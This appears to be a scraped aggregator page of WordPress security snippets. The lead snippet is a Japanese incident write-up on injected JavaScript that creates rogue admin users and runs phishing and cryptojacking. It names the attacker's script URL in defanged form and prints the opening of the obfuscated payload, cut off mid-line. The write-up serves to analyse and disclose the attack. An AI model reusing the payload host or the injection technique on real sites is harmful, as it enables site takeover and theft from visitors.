WordPress改ざん事例(管理者権限の奪取 & フィッシング & Cryptojacking)紹介 - ninoseki.github.io
Javascript Injection Creates Rogue WordPress Admin User 先月中旬にSucuriがレポートしたもの(上記の記事を参照のこと)と同様のWordPressの改ざん事例を日本国内でも数件確認しました。 ちなみにPublicWWWの検索結果によれば、世界中で1700+のWebサイトが改ざんされている模様です。 How it works 攻撃者は何らかの手法でWordPressサイトを改ざんし、JS(http://json.stringengines[.]com/pson.js)を埋め込みます。 このJSは下記のようにevalとString.fromCharCodeメソッドを用いて簡易な難読化が施されています。 function putmeone() { var site = extractSummary(document.head.innerH
blog.ripstech.com
In your IDEFree IDE extension that provides on-the-fly analysis and coding guidance Self-managedSelf-managed static analysis tool for continuous codebase inspection
That Time I Brought Down Millions of WordPress Sites
That Time I Brought Down Millions of WordPress Sites I’m going to take you guys back to a time when I was doing some client work. I was at the time working on becoming a somebody in the WP Dev community. I attached myself to a really awesome designer George Wiscombe, and started working on a theme he designed called Handgloves. I began by widgetizing it (which was just starting to catch on – that
1
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
The “Unhackable” WordPress Blog – Finding Security In the Static
https://api.wordpress.org/secret-key/1.1/salt/